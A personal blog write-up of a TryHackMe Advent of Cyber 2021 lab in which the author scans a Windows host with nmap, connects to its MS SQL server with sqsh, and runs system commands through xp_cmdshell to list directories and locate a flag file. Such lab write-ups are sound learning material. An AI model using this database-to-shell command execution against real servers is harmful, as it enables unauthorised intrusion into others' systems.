AoC3#11: Where Are The Reindeers

I’m now 46% of the way through the Advent of Cyber challenge, hosted by TryHackMe for December 2021. This writeup will cover Day 11, Where Are The Reindeers.

Previous writeups on my blog include Day 8 Santa’s Bag of Toys, Day 9 Where Is All This Data Going and Day 10 Offensive is the best Defence

I’m up to Day 11 of this Christmas CTF

CTF – Where Are The Reindeers

This challenge see’s me using sqsh – an interactive shell for MS-SQL databases.

We know that MS SQL Server is a Window’s based Relational Database Management System (RDBMS). As it’s hosted on a Microsoft Window’s box, scanning with nmap is likely be unable to find the host (by default).

└─$ nmap $IP -sT --top-ports=100     
      
Starting Nmap 7.92 at 2021-12-18 06:13 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.11 seconds

As expected. I threw on the ‘assume the host is up‘ argument (-Pn):

└─$ nmap $IP -sT --top-ports=100 -Pn

Starting Nmap 7.92 at 2021-12-18 06:14 EST
Nmap scan report for 10.10.164.145
Host is up (0.040s latency).
Not shown: 96 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
135/tcp  open  msrpc
{port}/tcp open  ms-sql-s
{port}/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 2.11 seconds

With the port number, I connected to MS SQL remotely using the sqsh shell.

It’s possible to then query the names and schedule tables from within the reindeer schema.

We’re then asked to get some remote code execution going on, using the xp_cmdshell command. I’d never used this before so that was interesting to see. As a test, I dropped a simple network command:

1> xp_cmdshell 'ipconfig /all'
2> go
output                                                                                                                                                                               
                                                                                                                                                                               
Windows IP Configuration                                                                                                                                                              
                                                                                                                                                                               
Host Name . . . . . . . . . . . . : AOC2021-MSSQL                                                                                                                                  
Primary Dns Suffix  . . . . . . . :                                                                                                                                                
Node Type . . . . . . . . . . . . : Hybrid                                                                                                                                         
IP Routing Enabled. . . . . . . . : No                                                                                                                                             
WINS Proxy Enabled. . . . . . . . : No                                                                                                                                             
DNS Suffix Search List. . . . . . : eu-west-1.ec2-
...                                                                                                                                      
Link-local IPv6 Address . . . . . : fe80::a845:5408:...                                                                                                     
IPv4 Address. . . . . . . . . . . : 10.10.164.145(Preferred)                                                                                                                       
Subnet Mask . . . . . . . . . . . : 255.255.0.0                                                                                                                                                                                                                                          
Default Gateway . . . . . . . . . : 10.10.0.1                                                                                                                                      
DHCP Server . . . . . . . . . . . : 10.10.0.1                                                                                                                                      
DHCPv6 IAID . . . . . . . . . . . : 118418632                                                                                                                                      
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-...                                                                    
DNS Servers . . . . . . . . . . . : 10.0.0.2                                                                                                                                       
NetBIOS over Tcpip. . . . . . . . : Enabled                                                                                                                                        
...                                     

I’m sure that’ll RCE will come in useful for future CTF events. So will this one:

2> xp_cmdshell path
3> go

...
PATH=C:\Windows\system32; C:\Windows; C:\Windows\System32\Wbem; C:\Windows\System32\WindowsPowerShell\v1.0\; C:\Windows\System32\OpenSSH\; C:\Program Files\Amazon\cfn-bootstrap\;C:\Program Files (x86)\Microsoft SQL Server 
\150\DTS\Binn\; C:\Program Files\Azure Data Studio\bin; C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\; C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\Microsoft SQL Server\150\Tools\Binn\; C:\Program Files\
Microsoft SQL Server\150\DTS\Binn\;  C:\ProgramData\chocolatey\bin; C:\Windows\ServiceProfiles\MSSQLSERVER\AppData\Local\Microsoft\WindowsApps 

By chaining two commands together, we browse to the grinch’s home directory and display it’s contents in one instruction. I do this as the xp_cmdshell seems to be stateless.

1> xp_cmdshell 'cd c:\users\grinch & dir'
2> go
output                                                                                                                                                                                   
Volume in drive C has no label.                                                                                                                                                                                        
Volume Serial Number is A8A4-C362                                                                                                                                                                                      
NULL                                                                                                                                                                                                                    
Directory of c:\Users\grinch                                                                                                                                                                                           
NULL                                                                                                                                                                                                                    
11/10/2021  02:22 AM    <DIR>          .                                                                                                                                                                                
11/10/2021  02:22 AM    <DIR>          ..                                                                                                                                                                               
11/10/2021  02:22 AM    <DIR>          3D Objects                                                                                                                                                                       
11/10/2021  02:22 AM    <DIR>          Contacts                                                                                                                                                                         
11/10/2021  02:22 AM    <DIR>          Desktop                                                                                                                                                                          
11/10/2021  02:29 AM    <DIR>          Documents                                                                                                                                                                        
11/10/2021  02:22 AM    <DIR>          Downloads                                                                                                                                                                        
11/10/2021  02:22 AM    <DIR>          Favorites                                                                                                                                                                        
11/10/2021  02:22 AM    <DIR>          Links                                                                                                                                                                            
11/10/2021  02:22 AM    <DIR>          Music                                                                                                                                                                            
11/10/2021  02:22 AM    <DIR>          Pictures                                                                                                                                                                         
11/10/2021  02:22 AM    <DIR>          Saved Games                                                                                                                                                                      
11/10/2021  02:22 AM    <DIR>          Searches                                                                                                                                                                         
11/10/2021  02:22 AM    <DIR>          Videos                                                                                                                                                                           
0 File(s)              0 bytes                                                                                                                                                                           
14 Dir(s)   5,452,894,208 bytes free                                                                                                                                                                      
NULL                                                                                                                                                                                                                    

I then chained together a CD and a DIR command, to search for the flag automatically.

1> xp_cmdshell 'cd c:\users\grinch & dir "*flag*" /s /p'
2> go

Volume in drive C has no label.    
Volume Serial Number is A8A4-C362  
  
...
Directory of c:\Users\grinch\Documents   

11/10/2021  02:28 AM    21 flag.txt 
1 File(s) 21 bytes   
...

Probably shouldn’t have been surprised to find the file there, but the premise was still good. We can then use the type command to output the flag’s value.

With that flag revealed, I completed Day 11 of Advent for Cyber.

Again, I found this challenge enjoyable as it exposed me to two new things, sqsh and xp_cmdshell.

Leave a Reply

Your email address will not be published. Required fields are marked *